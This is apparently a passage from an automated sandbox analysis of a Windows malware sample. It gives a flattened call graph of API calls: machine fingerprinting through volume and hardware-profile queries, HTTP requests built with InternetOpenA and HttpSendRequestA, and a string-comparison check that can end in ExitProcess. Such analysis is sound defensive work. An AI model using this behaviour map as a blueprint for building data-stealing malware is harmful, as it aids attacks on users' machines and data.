73113->73114 73115 8e470c 3 API calls 73114->73115 73116 8e2feb 73115->73116 73117 8e470c 3 API calls 73116->73117 73118 8e3004 73117->73118 73119 8e470c 3 API calls 73118->73119 73120 8e301a 73119->73120 73121 8e470c 3 API calls 73120->73121 73122 8e3030 73121->73122 73123 8e470c 3 API calls 73122->73123 73124 8e3046 73123->73124 73125 8e470c 3 API calls 73124->73125 73126 8e305c 73125->73126 73127 8e470c 3 API calls 73126->73127 73128 8e3072 73127->73128 73129 8e470c 3 API calls 73128->73129 73130 8e308b 73129->73130 73131 8e470c 3 API calls 73130->73131 73132 8e30a0 73131->73132 73133 8e470c 3 API calls 73132->73133 73134 8e30b6 73133->73134 73135 8e470c 3 API calls 73134->73135 73136 8e30ce 73135->73136 73137 8e470c 3 API calls 73136->73137 73138 8e30e3 73137->73138 73139 8e470c 3 API calls 73138->73139 73140 8e30f9 73139->73140 73141 8e470c 3 API calls 73140->73141 73142 8e3112 73141->73142 73143 8e470c 3 API calls 73142->73143 73144 8e3128 73143->73144 73145 8e470c 3 API calls 73144->73145 73146 8e313d 73145->73146 73147 8e470c 3 API calls 73146->73147 73148 8e3153 73147->73148 73149 8e470c 3 API calls 73148->73149 73150 8e3168 73149->73150 73151 8e470c 3 API calls 73150->73151 73152 8e317d 73151->73152 73153 8e470c 3 API calls 73152->73153 73154 8e3196 73153->73154 73155 8e470c 3 API calls 73154->73155 73156 8e31ab 73155->73156 73157 8e470c 3 API calls 73156->73157 73158 8e31c1 73157->73158 73159 8e470c 3 API calls 73158->73159 73160 8e31d7 73159->73160 73161 8e470c 3 API calls 73160->73161 73162 8e31ed 73161->73162 73163 8e470c 3 API calls 73162->73163 73164 8e3202 73163->73164 73165 8e470c 3 API calls 73164->73165 73166 8e321b 73165->73166 73167 8e470c 3 API calls 73166->73167 73168 8e3231 73167->73168 73169 8e470c 3 API calls 73168->73169 73170 8e3247 73169->73170 73171 8e470c 3 API calls 73170->73171 73172 8e325c 73171->73172 73173 8e470c 3 API calls 73172->73173 73174 8e3271 73173->73174 73175 8e470c 3 API calls 73174->73175 73176 8e3287 73175->73176 73177 8e470c 3 API calls 73176->73177 73178 8e32a0 73177->73178 73179 8e470c 3 API calls 73178->73179 73180 8e32b5 73179->73180 73181 8e470c 3 API calls 73180->73181 73182 8e32ca 73181->73182 73183 8e470c 3 API calls 73182->73183 73184 8e32e0 73183->73184 73185 8e470c 3 API calls 73184->73185 73186 8e32f5 73185->73186 73187 8e470c 3 API calls 73186->73187 73188 8e330a 73187->73188 73189 8e470c 3 API calls 73188->73189 73190 8e3322 73189->73190 73191 8e470c 3 API calls 73190->73191 73192 8e3337 73191->73192 73193 8e470c 3 API calls 73192->73193 73194 8e334d 73193->73194 73195 8e470c 3 API calls 73194->73195 73196 8e3363 73195->73196 73197 8e470c 3 API calls 73196->73197 73198 8e3379 73197->73198 73199 8e470c 3 API calls 73198->73199 73200 8e338f 73199->73200 73201 8e470c 3 API calls 73200->73201 73202 8e33a8 73201->73202 73203 8e470c 3 API calls 73202->73203 73204 8e33be 73203->73204 73205 8e470c 3 API calls 73204->73205 73206 8e33d4 73205->73206 73207 8e470c 3 API calls 73206->73207 73208 8e33ea 73207->73208 73209 8e470c 3 API calls 73208->73209 73210 8e3400 73209->73210 73211 8e470c 3 API calls 73210->73211 73212 8e3416 73211->73212 73213 8e470c 3 API calls 73212->73213 73214 8e342f 73213->73214 73215 8e470c 3 API calls 73214->73215 73216 8e3445 73215->73216 73217 8e470c 3 API calls 73216->73217 73218 8e345b 73217->73218 73219 8e470c 3 API calls 73218->73219 73220 8e3470 73219->73220 73221 8e470c 3 API calls 73220->73221 73222 8e3486 73221->73222 73223 8e470c 3 API calls 73222->73223 73224 8e349c 73223->73224 73225 8e470c 3 API calls 73224->73225 73226 8e34b5 73225->73226 73227 8e470c 3 API calls 73226->73227 73228 8e34cb 73227->73228 73229 8e470c 3 API calls 73228->73229 73230 8e34e1 73229->73230 73231 8e470c 3 API calls 73230->73231 73232 8e34f7 73231->73232 73233 8e470c 3 API calls 73232->73233 73234 8e350d 73233->73234 73235 8e470c 3 API calls 73234->73235 73236 8e3523 73235->73236 73237 8e470c 3 API calls 73236->73237 73238 8e353c 73237->73238 73239 8e470c 3 API calls 73238->73239 73240 8e3552 73239->73240 73241 8e470c 3 API calls 73240->73241 73242 8e3568 73241->73242 73243 8e470c 3 API calls 73242->73243 73244 8e357e 73243->73244 73245 8e470c 3 API calls 73244->73245 73246 8e3594 73245->73246 73247 8e470c 3 API calls 73246->73247 73248 8e35aa 73247->73248 73249 8e470c 3 API calls 73248->73249 73250 8e35c2 73249->73250 73251 8e470c 3 API calls 73250->73251 73252 8e35d7 73251->73252 73253 8e470c 3 API calls 73252->73253 73254 8e35ed 73253->73254 73255 8e470c 3 API calls 73254->73255 73256 8e3603 73255->73256 73257 8e470c 3 API calls 73256->73257 73258 8e3619 73257->73258 73259 8e470c 3 API calls 73258->73259 73260 8e362e 73259->73260 73261 8e470c 3 API calls 73260->73261 73262 8e3647 73261->73262 73263 8e470c 3 API calls 73262->73263 73264 8e365d 73263->73264 73265 8e470c 3 API calls 73264->73265 73266 8e3673 73265->73266 73267 8e470c 3 API calls 73266->73267 73268 8e3688 73267->73268 73269 8e470c 3 API calls 73268->73269 73270 8e369e 73269->73270 73271 8e470c 3 API calls 73270->73271 73272 8e36b4 73271->73272 73273 8e470c 3 API calls 73272->73273 73274 8e36cd 73273->73274 73275 8e470c 3 API calls 73274->73275 73276 8e36e3 73275->73276 73277 8e470c 3 API calls 73276->73277 73278 8e36f9 73277->73278 73279 8e470c 3 API calls 73278->73279 73280 8e370f 73279->73280 73281 8e470c 3 API calls 73280->73281 73282 8e3725 73281->73282 73283 8e470c 3 API calls 73282->73283 73284 8e373b 73283->73284 73285 8e470c 3 API calls 73284->73285 73286 8e3754 73285->73286 73287 8e470c 3 API calls 73286->73287 73288 8e376a 73287->73288 73289 8e470c 3 API calls 73288->73289 73290 8e3780 73289->73290 73291 8e470c 3 API calls 73290->73291 73292 8e3796 73291->73292 73293 8e470c 3 API calls 73292->73293 73294 8e37ac 73293->73294 73295 8e470c 3 API calls 73294->73295 73296 8e37c1 73295->73296 73297 8e470c 3 API calls 73296->73297 73298 8e37da 73297->73298 73299 8e470c 3 API calls 73298->73299 73300 8e37ef 73299->73300 73301 8e470c 3 API calls 73300->73301 73302 8e3805 73301->73302 73303 8e470c 3 API calls 73302->73303 73304 8e381b 73303->73304 73305 8e470c 3 API calls 73304->73305 73306 8e3831 73305->73306 73307 8e470c 3 API calls 73306->73307 73308 8e3847 73307->73308 73309 8e470c 3 API calls 73308->73309 73310 8e385f 73309->73310 73311 8e470c 3 API calls 73310->73311 73312 8e3875 73311->73312 73313 8e470c 3 API calls 73312->73313 73314 8e388b 73313->73314 73315 8e470c 3 API calls 73314->73315 73316 8e38a1 73315->73316 73317 8e470c 3 API calls 73316->73317 73318 8e38b7 73317->73318 73319 8e470c 3 API calls 73318->73319 73320 8e38cd 73319->73320 73321 8e470c 3 API calls 73320->73321 73322 8e38e6 73321->73322 73323 8e470c 3 API calls 73322->73323 73324 8e38fc 73323->73324 73325 8e470c 3 API calls 73324->73325 73326 8e3912 73325->73326 73327 8e470c 3 API calls 73326->73327 73328 8e3928 73327->73328 73329 8e470c 3 API calls 73328->73329 73330 8e393e 73329->73330 73331 8e470c 3 API calls 73330->73331 73332 8e3954 73331->73332 73333 8e470c 3 API calls 73332->73333 73334 8e396d 73333->73334 73335 8e470c 3 API calls 73334->73335 73336 8e3982 73335->73336 73337 8e470c 3 API calls 73336->73337 73338 8e3998 73337->73338 73339 8e470c 3 API calls 73338->73339 73340 8e39ae 73339->73340 73341 8e470c 3 API calls 73340->73341 73342 8e39c4 73341->73342 73343 8e470c 3 API calls 73342->73343 73344 8e39da 73343->73344 73345 8e470c 3 API calls 73344->73345 73346 8e39f3 73345->73346 73347 8e470c 3 API calls 73346->73347 73348 8e3a09 73347->73348 73349 8e470c 3 API calls 73348->73349 73350 8e3a1f 73349->73350 73351 8e470c 3 API calls 73350->73351 73352 8e3a35 73351->73352 73353 8e470c 3 API calls 73352->73353 73354 8e3a4a 73353->73354 73355 8e470c 3 API calls 73354->73355 73356 8e3a60 73355->73356 73357 8e470c 3 API calls 73356->73357 73358 8e3a79 73357->73358 73359 8e470c 3 API calls 73358->73359 73360 8e3a8f 73359->73360 73361 8e470c 3 API calls 73360->73361 73362 8e3aa5 73361->73362 73363 8e470c 3 API calls 73362->73363 73364 8e3abb 73363->73364 73365 8e470c 3 API calls 73364->73365 73366 8e3ad1 73365->73366 73367 8e470c 3 API calls 73366->73367 73368 8e3ae7 73367->73368 73369 8e470c 3 API calls 73368->73369 73370 8e3b00 73369->73370 73371 8e470c 3 API calls 73370->73371 73372 8e3b16 73371->73372 73373 8e470c 3 API calls 73372->73373 73374 8e3b2c 73373->73374 73375 8e470c 3 API calls 73374->73375 73376 8e3b42 73375->73376 73377 8e470c 3 API calls 73376->73377 73378 8e3b57 73377->73378 73379 8e470c 3 API calls 73378->73379 73380 8e3b6d 73379->73380 73381 8e470c 3 API calls 73380->73381 73382 8e3b86 73381->73382 73383 8e470c 3 API calls 73382->73383 73384 8e3b9c 73383->73384 73385 8e470c 3 API calls 73384->73385 73386 8e3bb2 73385->73386 73387 8e470c 3 API calls 73386->73387 73388 8e3bc8 73387->73388 73389 8e470c 3 API calls 73388->73389 73390 8e3bde 73389->73390 73391 8e470c 3 API calls 73390->73391 73392 8e3bf4 73391->73392 73393 8e470c 3 API calls 73392->73393 73394 8e3c0d 73393->73394 73395 8e470c 3 API calls 73394->73395 73396 8e3c23 73395->73396 73397 8e470c 3 API calls 73396->73397 73398 8e3c39 73397->73398 73399 8e470c 3 API calls 73398->73399 73400 8e3c4f 73399->73400 73401 8e470c 3 API calls 73400->73401 73402 8e3c64 73401->73402 73403 8e470c 3 API calls 73402->73403 73404 8e3c7a 73403->73404 73405 8e470c 3 API calls 73404->73405 73406 8e3c92 73405->73406 73407 8e470c 3 API calls 73406->73407 73408 8e3ca8 73407->73408 73409 8e470c 3 API calls 73408->73409 73410 8e3cbe 73409->73410 73411 8e470c 3 API calls 73410->73411 73412 8e3cd4 73411->73412 73413 8e470c 3 API calls 73412->73413 73414 8e3cea 73413->73414 73415 8e470c 3 API calls 73414->73415 73416 8e3d00 73415->73416 73417 8e470c 3 API calls 73416->73417 73418 8e3d19 73417->73418 73419 8e470c 3 API calls 73418->73419 73420 8e3d2f 73419->73420 73421 8e470c 3 API calls 73420->73421 73422 8e3d45 73421->73422 73423 8e470c 3 API calls 73422->73423 73424 8e3d5b 73423->73424 73425 8e470c 3 API calls 73424->73425 73426 8e3d71 73425->73426 73427 8e470c 3 API calls 73426->73427 73428 8e3d87 73427->73428 73429 8e470c 3 API calls 73428->73429 73430 8e3da0 73429->73430 73431 8e470c 3 API calls 73430->73431 73432 8e3db6 73431->73432 73433 8e470c 3 API calls 73432->73433 73434 8e3dcc 73433->73434 73435 8e470c 3 API calls 73434->73435 73436 8e3de1 73435->73436 73437 8e470c 3 API calls 73436->73437 73438 8e3df7 73437->73438 73439 8e470c 3 API calls 73438->73439 73440 8e3e0d 73439->73440 73441 8e470c 3 API calls 73440->73441 73442 8e3e26 73441->73442 73443 8e470c 3 API calls 73442->73443 73444 8e3e3c 73443->73444 73445 8e470c 3 API calls 73444->73445 73446 8e3e52 73445->73446 73447 8e470c 3 API calls 73446->73447 73448 8e3e67 73447->73448 73449 8e470c 3 API calls 73448->73449 73450 8e3e7d 73449->73450 73451 8e470c 3 API calls 73450->73451 73452 8e3e93 73451->73452 73453 8e470c 3 API calls 73452->73453 73454 8e3eac 73453->73454 73455 8e470c 3 API calls 73454->73455 73456 8e3ec2 73455->73456 73457 8e470c 3 API calls 73456->73457 73458 8e3ed8 73457->73458 73459 8e470c 3 API calls 73458->73459 73460 8e3eee 73459->73460 73461 8e470c 3 API calls 73460->73461 73462 8e3f04 73461->73462 73463 8e470c 3 API calls 73462->73463 73464 8e3f19 73463->73464 73465 8e470c 3 API calls 73464->73465 73466 8e3f32 73465->73466 73467 8e470c 3 API calls 73466->73467 73468 8e3f48 73467->73468 73469 8e470c 3 API calls 73468->73469 73470 8e3f5e 73469->73470 73471 8e470c 3 API calls 73470->73471 73472 8e3f74 73471->73472 73473 8e470c 3 API calls 73472->73473 73474 8e3f8a 73473->73474 73475 8e470c 3 API calls 73474->73475 73476 8e3fa0 73475->73476 73477 8e470c 3 API calls 73476->73477 73478 8e3fb8 73477->73478 73479 8e470c 3 API calls 73478->73479 73480 8e3fce 73479->73480 73481 8e470c 3 API calls 73480->73481 73482 8e3fe3 73481->73482 73483 8e470c 3 API calls 73482->73483 73484 8e3ff8 73483->73484 73485 8e470c 3 API calls 73484->73485 73486 8e400e 73485->73486 73487 8e470c 3 API calls 73486->73487 73488 8e4023 73487->73488 73489 8e470c 3 API calls 73488->73489 73490 8e403c 73489->73490 73491 8e470c 3 API calls 73490->73491 73492 8e4052 73491->73492 73493 8e470c 3 API calls 73492->73493 73494 8e4068 73493->73494 73495 8e470c 3 API calls 73494->73495 73496 8e407e 73495->73496 73497 8e470c 3 API calls 73496->73497 73498 8e4094 73497->73498 73499 8e470c 3 API calls 73498->73499 73500 8e40aa 73499->73500 73501 8e470c 3 API calls 73500->73501 73502 8e40c2 73501->73502 73503 8e470c 3 API calls 73502->73503 73504 8e40d7 73503->73504 73505 8e470c 3 API calls 73504->73505 73506 8e40ec 73505->73506 73507 8e470c 3 API calls 73506->73507 73508 8e4102 73507->73508 73509 8e470c 3 API calls 73508->73509 73510 8e4118 73509->73510 73511 8e470c 3 API calls 73510->73511 73512 8e412d 73511->73512 73513 8e470c 3 API calls 73512->73513 73514 8e4146 73513->73514 73515 8e470c 3 API calls 73514->73515 73516 8e415c 73515->73516 73517 8e470c 3 API calls 73516->73517 73518 8e4171 73517->73518 73519 8e470c 3 API calls 73518->73519 73520 8e4187 73519->73520 73521 8e470c 3 API calls 73520->73521 73522 8e419d 73521->73522 73523 8e470c 3 API calls 73522->73523 73524 8e41b2 73523->73524 73525 8e470c 3 API calls 73524->73525 73526 8e41cb 73525->73526 73527 8e470c 3 API calls 73526->73527 73528 8e41e1 73527->73528 73529 8e470c 3 API calls 73528->73529 73530 8e41f7 73529->73530 73531 8e470c 3 API calls 73530->73531 73532 8e420c 73531->73532 73533 8e470c 3 API calls 73532->73533 73534 8e4222 73533->73534 73535 8e470c 3 API calls 73534->73535 73536 8e4238 73535->73536 73537 8e470c 3 API calls 73536->73537 73538 8e4251 73537->73538 73539 8e470c 3 API calls 73538->73539 73540 8e4267 73539->73540 73541 8e470c 3 API calls 73540->73541 73542 8e427d 73541->73542 73543 8e470c 3 API calls 73542->73543 73544 8e4292 73543->73544 73545 8e470c 3 API calls 73544->73545 73546 8e42a8 73545->73546 73547 8e470c 3 API calls 73546->73547 73548 8e42be 73547->73548 73549 8e470c 3 API calls 73548->73549 73550 8e42d7 73549->73550 73551 8e470c 3 API calls 73550->73551 73552 8e42ec 73551->73552 73553 8e470c 3 API calls 73552->73553 73554 8e4302 73553->73554 73555 8e470c 3 API calls 73554->73555 73556 8e4318 73555->73556 73557 8e470c 3 API calls 73556->73557 73558 8e432e 73557->73558 73559 8e470c 3 API calls 73558->73559 73560 8e4344 73559->73560 73561 8e470c 3 API calls 73560->73561 73562 8e435d 73561->73562 73563 8e470c 3 API calls 73562->73563 73564 8e4373 73563->73564 73565 8e470c 3 API calls 73564->73565 73566 8e4388 73565->73566 73567 8e470c 3 API calls 73566->73567 73568 8e439d 73567->73568 73569 8e470c 3 API calls 73568->73569 73570 8e43b2 73569->73570 73571 8e470c 3 API calls 73570->73571 73572 8e43c7 73571->73572 73573 8e470c 3 API calls 73572->73573 73574 8e43e0 73573->73574 73575 8e470c 3 API calls 73574->73575 73576 8e43f6 73575->73576 73577 8e470c 3 API calls 73576->73577 73578 8e440b 73577->73578 73579 8e470c 3 API calls 73578->73579 73580 8e4421 73579->73580 73581 8e470c 3 API calls 73580->73581 73582 8e4436 73581->73582 73583 8e470c 3 API calls 73582->73583 73584 8e444c 73583->73584 73585 8e470c 3 API calls 73584->73585 73586 8e4465 73585->73586 73587 8e470c 3 API calls 73586->73587 73588 8e447a 73587->73588 73589 8e470c 3 API calls 73588->73589 73590 8e448f 73589->73590 73591 8e470c 3 API calls 73590->73591 73592 8e44a5 73591->73592 73593 8e470c 3 API calls 73592->73593 73594 8e44bb 73593->73594 73595 8e470c 3 API calls 73594->73595 73596 8e44d1 73595->73596 73597 8e470c 3 API calls 73596->73597 73598 8e44ea 73597->73598 73599 8e470c 3 API calls 73598->73599 73600 8e4500 73599->73600 73601 8e470c 3 API calls 73600->73601 73602 8e4516 73601->73602 73603 8e470c 3 API calls 73602->73603 73604 8e452c 73603->73604 73605 8e470c 3 API calls 73604->73605 73606 8e4541 73605->73606 73607 8e470c 3 API calls 73606->73607 73608 8e4556 73607->73608 73609 8e470c 3 API calls 73608->73609 73610 8e4571 73609->73610 73611 8e470c 3 API calls 73610->73611 73612 8e4586 73611->73612 73613 8e470c 3 API calls 73612->73613 73614 8e459c 73613->73614 73615 8e470c 3 API calls 73614->73615 73616 8e45b2 73615->73616 73617 8e470c 3 API calls 73616->73617 73618 8e45c8 73617->73618 73619 8e470c 3 API calls 73618->73619 73620 8e45de 73619->73620 73621 8e470c 3 API calls 73620->73621 73622 8e45f7 73621->73622 73623 8e470c 3 API calls 73622->73623 73624 8e460d 73623->73624 73625 8e470c 3 API calls 73624->73625 73626 8e4622 73625->73626 73627 8e470c 3 API calls 73626->73627 73628 8e4637 73627->73628 73629 8e470c 3 API calls 73628->73629 73630 8e464d 73629->73630 73631 8e470c 3 API calls 73630->73631 73632 8e4662 73631->73632 73633 8e470c 3 API calls 73632->73633 73634 8e467b 73633->73634 73635 8e470c 3 API calls 73634->73635 73636 8e4691 73635->73636 73637 8e470c 3 API calls 73636->73637 73638 8e46a6 73637->73638 73639 8e470c 3 API calls 73638->73639 73640 8e46bb 73639->73640 73641 8e470c 3 API calls 73640->73641 73642 8e46d1 73641->73642 73643 8e470c 3 API calls 73642->73643 73644 8e46e7 73643->73644 73645 8e470c 3 API calls 73644->73645 73646 8e4700 73645->73646 73646->72849 73648 8f2143 lstrcpy 73647->73648 73649 8f38c3 73648->73649 73650 8f2143 lstrcpy 73649->73650 73651 8f38d1 GetSystemTime 73650->73651 73652 8f38ed 73651->73652 73653 8fe88c ___crtMessageBoxW 5 API calls 73652->73653 73654 8f3924 73653->73654 73654->72853 73657 8f223d 73655->73657 73656 8f2261 73656->72861 73657->73656 73658 8f224f lstrcpy lstrcat 73657->73658 73658->73656 73660 8f2175 lstrcpy 73659->73660 73661 8e1cf7 73660->73661 73662 8f2175 lstrcpy 73661->73662 73663 8e1d02 73662->73663 73664 8f2175 lstrcpy 73663->73664 73665 8e1d0d 73664->73665 73666 8f2175 lstrcpy 73665->73666 73667 8e1d24 73666->73667 73668 8f8705 73667->73668 73669 8f21a5 2 API calls 73668->73669 73670 8f873b 73669->73670 73671 8f21a5 2 API calls 73670->73671 73672 8f8748 73671->73672 73673 8f21a5 2 API calls 73672->73673 73674 8f8755 73673->73674 73675 8f2143 lstrcpy 73674->73675 73676 8f8762 73675->73676 73677 8f2143 lstrcpy 73676->73677 73678 8f876f 73677->73678 73679 8f2143 lstrcpy 73678->73679 73680 8f877c 73679->73680 73681 8f2143 lstrcpy 73680->73681 73682 8f8789 73681->73682 73683 8f2143 lstrcpy 73682->73683 73684 8f8796 73683->73684 73685 8f2143 lstrcpy 73684->73685 73686 8f87a3 73685->73686 73689 8e1ced lstrcpy 73686->73689 73690 8f87e7 StrCmpCA 73686->73690 73691 8f8840 StrCmpCA 73686->73691 73701 8f8615 33 API calls 73686->73701 73702 8f21e9 lstrcpy 73686->73702 73705 8f88a0 StrCmpCA 73686->73705 73707 8f88f9 StrCmpCA 73686->73707 73718 8f2175 lstrcpy 73686->73718 73737 8f858d 28 API calls 73686->73737 74727 8e29e8 73686->74727 74730 8e29f9 73686->74730 74733 8e2a0a 73686->74733 74743 8e2a1b lstrcpy 73686->74743 74744 8e2a2c lstrcpy 73686->74744 74745 8e2a3d lstrcpy 73686->74745 73689->73686 73690->73686 73690->73691 73691->73686 73692 8f8a23 73691->73692 73695 8f21e9 lstrcpy 73692->73695 73696 8f8a2e 73695->73696 73698 8f2143 lstrcpy 73696->73698 73699 8f8a3b 73698->73699 73700 8f21e9 lstrcpy 73699->73700 73735 8f897b 73700->73735 73701->73686 73702->73686 73703 8f2143 lstrcpy 73704 8f8a5a 73703->73704 73706 8f21e9 lstrcpy 73704->73706 73705->73686 73705->73707 73708 8f8a64 73706->73708 73709 8f890f StrCmpCA 73707->73709 73710 8f89f2 73707->73710 74736 8f8af1 73708->74736 73713 8f8925 StrCmpCA 73709->73713 73714 8f89c1 73709->73714 73712 8f21e9 lstrcpy 73710->73712 73715 8f89fd 73712->73715 73716 8f898d 73713->73716 73717 8f8937 StrCmpCA 73713->73717 73719 8f21e9 lstrcpy 73714->73719 73721 8f2143 lstrcpy 73715->73721 73725 8f21e9 lstrcpy 73716->73725 73722 8f8959 73717->73722 73723 8f8949 Sleep 73717->73723 73718->73686 73724 8f89cc 73719->73724 73727 8f8a0a 73721->73727 73728 8f21e9 lstrcpy 73722->73728 73723->73686 73729 8f2143 lstrcpy 73724->73729 73726 8f8998 73725->73726 73730 8f2143 lstrcpy 73726->73730 73731 8f21e9 lstrcpy 73727->73731 73732 8f8964 73728->73732 73733 8f89d9 73729->73733 73734 8f89a5 73730->73734 73731->73735 73736 8f2143 lstrcpy 73732->73736 73738 8f21e9 lstrcpy 73733->73738 73739 8f21e9 lstrcpy 73734->73739 73735->73703 73740 8f8971 73736->73740 73737->73686 73738->73735 73739->73735 73741 8f21e9 lstrcpy 73740->73741 73741->73735 73742 8f8a77 73742->72867 73744 8f21e9 lstrcpy 73743->73744 73745 8f9a32 73744->73745 73746 8f21e9 lstrcpy 73745->73746 73747 8f9a3d 73746->73747 73748 8f21e9 lstrcpy 73747->73748 73749 8f9a48 73748->73749 73749->72869 73751 8f2185 73750->73751 73752 8f219a 73751->73752 73753 8f2192 lstrcpy 73751->73753 73752->72876 73753->73752 73755 8f263b 73754->73755 73756 8f2642 GetVolumeInformationA 73754->73756 73755->73756 73757 8f26a9 73756->73757 73757->73757 73758 8f26be GetProcessHeap RtlAllocateHeap 73757->73758 73759 8f26d9 73758->73759 73760 8f26e8 wsprintfA lstrcat 73758->73760 73762 8f2143 lstrcpy 73759->73762 74746 8f32e0 GetCurrentHwProfileA 73760->74746 73764 8f26e1 73762->73764 73763 8f2723 lstrlen 74762 8f421b lstrcpy malloc strncpy 73763->74762 73767 8fe88c ___crtMessageBoxW 5 API calls 73764->73767 73766 8f2746 lstrcat 73769 8f275d 73766->73769 73768 8f278a 73767->73768 73768->72891 73770 8f2143 lstrcpy 73769->73770 73771 8f2774 73770->73771 73771->73764 73773 8f2175 lstrcpy 73772->73773 73774 8e4a81 73773->73774 74766 8e49de 73774->74766 73776 8e4a8d 73777 8f2143 lstrcpy 73776->73777 73778 8e4aa9 73777->73778 73779 8f2143 lstrcpy 73778->73779 73780 8e4ab9 73779->73780 73781 8f2143 lstrcpy 73780->73781 73782 8e4ac9 73781->73782 73783 8f2143 lstrcpy 73782->73783 73784 8e4ad9 73783->73784 73785 8f2143 lstrcpy 73784->73785 73786 8e4ae9 InternetOpenA StrCmpCA 73785->73786 73787 8e4b1d 73786->73787 73788 8e50bc InternetCloseHandle 73787->73788 73789 8f38a6 7 API calls 73787->73789 73799 8e5109 73788->73799 73790 8e4b3d 73789->73790 73791 8f2223 2 API calls 73790->73791 73792 8e4b50 73791->73792 73793 8f21e9 lstrcpy 73792->73793 73794 8e4b5b 73793->73794 73795 8f2265 3 API calls 73794->73795 73796 8e4b87 73795->73796 73797 8f21e9 lstrcpy 73796->73797 73798 8e4b92 73797->73798 73800 8f2265 3 API calls 73798->73800 73801 8fe88c ___crtMessageBoxW 5 API calls 73799->73801 73802 8e4bb3 73800->73802 73803 8e515d 73801->73803 73804 8f21e9 lstrcpy 73802->73804 73905 8f56ff StrCmpCA 73803->73905 73805 8e4bbe 73804->73805 73806 8f2223 2 API calls 73805->73806 73807 8e4be0 73806->73807 73808 8f21e9 lstrcpy 73807->73808 73809 8e4beb 73808->73809 73810 8f2265 3 API calls 73809->73810 73811 8e4c0c 73810->73811 73812 8f21e9 lstrcpy 73811->73812 73813 8e4c17 73812->73813 73814 8f2265 3 API calls 73813->73814 73815 8e4c38 73814->73815 73816 8f21e9 lstrcpy 73815->73816 73817 8e4c43 73816->73817 73818 8f2265 3 API calls 73817->73818 73819 8e4c65 73818->73819 73820 8f2223 2 API calls 73819->73820 73821 8e4c70 73820->73821 73822 8f21e9 lstrcpy 73821->73822 73823 8e4c7b 73822->73823 73824 8e4c91 InternetConnectA 73823->73824 73824->73788 73825 8e4cbf HttpOpenRequestA 73824->73825 73826 8e4cff 73825->73826 73827 8e50b0 InternetCloseHandle 73825->73827 73828 8e4d07 InternetSetOptionA 73826->73828 73829 8e4d23 73826->73829 73827->73788 73828->73829 73830 8f2265 3 API calls 73829->73830 73831 8e4d39 73830->73831 73832 8f21e9 lstrcpy 73831->73832 73833 8e4d44 73832->73833 73834 8f2223 2 API calls 73833->73834 73835 8e4d66 73834->73835 73836 8f21e9 lstrcpy 73835->73836 73837 8e4d71 73836->73837 73838 8f2265 3 API calls 73837->73838 73839 8e4d92 73838->73839 73840 8f21e9 lstrcpy 73839->73840 73841 8e4d9d 73840->73841 73842 8f2265 3 API calls 73841->73842 73843 8e4dbf 73842->73843 73844 8f21e9 lstrcpy 73843->73844 73845 8e4dca 73844->73845 73846 8f2265 3 API calls 73845->73846 73847 8e4deb 73846->73847 73848 8f21e9 lstrcpy 73847->73848 73849 8e4df6 73848->73849 73850 8f2265 3 API calls 73849->73850 73851 8e4e17 73850->73851 73852 8f21e9 lstrcpy 73851->73852 73853 8e4e22 73852->73853 73854 8f2223 2 API calls 73853->73854 73855 8e4e41 73854->73855 73856 8f21e9 lstrcpy 73855->73856 73857 8e4e4c 73856->73857 73858 8f2265 3 API calls 73857->73858 73859 8e4e6d 73858->73859 73860 8f21e9 lstrcpy 73859->73860 73861 8e4e78 73860->73861 73862 8f2265 3 API calls 73861->73862 73863 8e4e99 73862->73863 73864 8f21e9 lstrcpy 73863->73864 73865 8e4ea4 73864->73865 73866 8f2223 2 API calls 73865->73866 73867 8e4ec6 73866->73867 73868 8f21e9 lstrcpy 73867->73868 73869 8e4ed1 73868->73869 73870 8f2265 3 API calls 73869->73870 73871 8e4ef2 73870->73871 73872 8f21e9 lstrcpy 73871->73872 73873 8e4efd 73872->73873 73874 8f2265 3 API calls 73873->73874 73875 8e4f1f 73874->73875 73876 8f21e9 lstrcpy 73875->73876 73877 8e4f2a 73876->73877 73878 8f2265 3 API calls 73877->73878 73879 8e4f4b 73878->73879 73880 8f21e9 lstrcpy 73879->73880 73881 8e4f56 73880->73881 73882 8f2265 3 API calls 73881->73882 73883 8e4f77 73882->73883 73884 8f21e9 lstrcpy 73883->73884 73885 8e4f82 73884->73885 73886 8f2223 2 API calls 73885->73886 73887 8e4fa1 73886->73887 73888 8f21e9 lstrcpy 73887->73888 73889 8e4fac 73888->73889 73890 8f2143 lstrcpy 73889->73890 73891 8e4fc7 73890->73891 73892 8f2223 2 API calls 73891->73892 73893 8e4fde 73892->73893 73894 8f2223 2 API calls 73893->73894 73895 8e4fef 73894->73895 73896 8f21e9 lstrcpy 73895->73896 73897 8e4ffa 73896->73897 73898 8e5010 lstrlen lstrlen HttpSendRequestA 73897->73898 73899 8e5084 InternetReadFile 73898->73899 73900 8e509e InternetCloseHandle 73899->73900 73903 8e5044 73899->73903 73901 8e2910 73900->73901 73901->73827 73902 8f2265 3 API calls 73902->73903 73903->73899 73903->73900 73903->73902 73904 8f21e9 lstrcpy 73903->73904 73904->73903 73906 8f571e ExitProcess 73905->73906 73907 8f5725 strtok_s 73905->73907 73908 8f5885 73907->73908 73909 8f5741 73907->73909 73908->72896 73910 8f5867 strtok_s 73909->73910 73911 8f575e StrCmpCA 73909->73911 73912 8f57dc StrCmpCA 73909->73912 73913 8f581b StrCmpCA 73909->73913 73914 8f577a StrCmpCA 73909->73914 73915 8f5796 StrCmpCA 73909->73915 73916 8f5806 StrCmpCA 73909->73916 73917 8f5853 StrCmpCA 73909->73917 73918 8f57b2 StrCmpCA 73909->73918 73919 8f57f1 StrCmpCA 73909->73919 73920 8f5831 StrCmpCA 73909->73920 73921 8f21a5 2 API calls 73909->73921 73910->73908 73910->73909 73911->73909 73911->73910 73912->73909 73912->73910 73913->73910 73914->73909 73914->73910 73915->73909 73915->73910 73916->73909 73916->73910 73917->73910 73918->73909 73918->73910 73919->73909 73919->73910 73920->73910 73921->73909 73923 8f2175 lstrcpy 73922->73923 73924 8e5e8c 73923->73924 73925 8e49de 5 API calls 73924->73925 73926 8e5e98 73925->73926 73927 8f2143 lstrcpy 73926->73927 73928 8e5eb4 73927->73928 73929 8f2143 lstrcpy 73928->73929 73930 8e5ec4 73929->73930 73931 8f2143 lstrcpy 73930->73931 73932 8e5ed4 73931->73932 73933 8f2143 lstrcpy 73932->73933 73934 8e5ee4 73933->73934 73935 8f2143 lstrcpy 73934->73935 73936 8e5ef4 InternetOpenA StrCmpCA 73935->73936 73937 8e5f28 73936->73937 73938 8e663e InternetCloseHandle 73937->73938 73940 8f38a6 7 API calls 73937->73940 74772 8e91ff 73938->74772 73942 8e5f48 73940->73942 73941 8e665f 73944 8f21a5 2 API calls 73941->73944 73956 8e668b 73941->73956 73943 8f2223 2 API 